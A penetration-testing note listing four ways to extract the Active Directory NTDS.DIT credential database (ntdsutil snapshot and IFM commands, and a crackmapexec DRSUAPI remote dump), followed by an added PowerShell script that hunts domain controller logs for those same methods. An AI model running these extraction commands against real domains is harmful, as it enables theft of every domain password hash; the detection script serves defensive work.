Internal Infrastructure Pentest - Extracting NTDS.DIT File


Method 1 (ntdsutil snapshot):

ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit"
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit

Method 2 (ntdsutil IFM, interactive):

C:\>ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

Method 3 (ntdsutil IFM, one-liner with abbreviated commands):

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q

Method 4 (remote, via DRSUAPI replication):

crackmapexec.py -u DA_USERNAME -p DA_PASSWORD -d FQDN_DOMAIN DOMAIN_IP --ntds drsuapi
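A defender-side check for the four methods above, added here and not part of the original note: a PowerShell hunt over a domain controller's Security log for ntdsutil process creations (4688, methods 1 to 3) and for use of the replication rights that the DRSUAPI path of method 4 relies on (4662). It assumes "Audit Process Creation" with command-line logging and "Audit Directory Service Access" are enabled on the DC; the two GUIDs are the well-known DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights.

```powershell
# Added example, not from the original note. Hunts the DC Security log for the
# NTDS extraction paths listed above. Assumes "Audit Process Creation" with
# command-line logging (4688) and "Audit Directory Service Access" (4662) are on.

function Get-NtdsExtractionEvents {
    param([int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)

    # Command-line indicators for the ntdsutil snapshot / IFM methods (1-3).
    $cmdPatterns = 'ntdsutil', 'ntds\.dit', '\bifm\b', '\bsnapshot\b',
                   'activate instance ntds', '\bac in ntds\b'
    # Control-access right GUIDs requested by DRSUAPI replication (method 4):
    # DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.
    $replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',
                 '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'

    # Flatten the EventData section of an event into a name -> value table.
    function Get-EventData([System.Diagnostics.Eventing.Reader.EventRecord]$Event) {
        $table = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) {
            $table[$d.Name] = $d.'#text'
        }
        $table
    }

    $filter = @{ LogName = 'Security'; Id = 4688, 4662; StartTime = $since }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $data = Get-EventData $e
        if ($e.Id -eq 4688) {
            $cmd = $data['CommandLine']
            if (-not $cmd) { continue }   # command-line auditing not enabled
            $hits = $cmdPatterns | Where-Object { $cmd -match $_ }
            if ($hits) {
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 4688
                    Account = $data['SubjectUserName']; Detail = $cmd
                    Matched = ($hits -join ', ') }
            }
        } else {
            # 4662: the Properties field lists the access-right GUIDs that were used.
            $props = $data['Properties']
            $hits = $replGuids | Where-Object { $props -match $_ }
            # DC computer accounts (name ends in $) replicate legitimately; review the rest.
            if ($hits -and $data['SubjectUserName'] -notmatch '\$$') {
                [pscustomobject]@{ Time = $e.TimeCreated; Id = 4662
                    Account = $data['SubjectUserName']; Detail = $data['ObjectName']
                    Matched = ($hits -join ', ') }
            }
        }
    }
}

Get-NtdsExtractionEvents -Days 7 | Format-Table -AutoSize
```

Run it on the DC (or against exported logs with Get-WinEvent -Path) and treat any non-DC account requesting the replication GUIDs, or any ntdsutil invocation outside a scheduled backup window, as something to investigate.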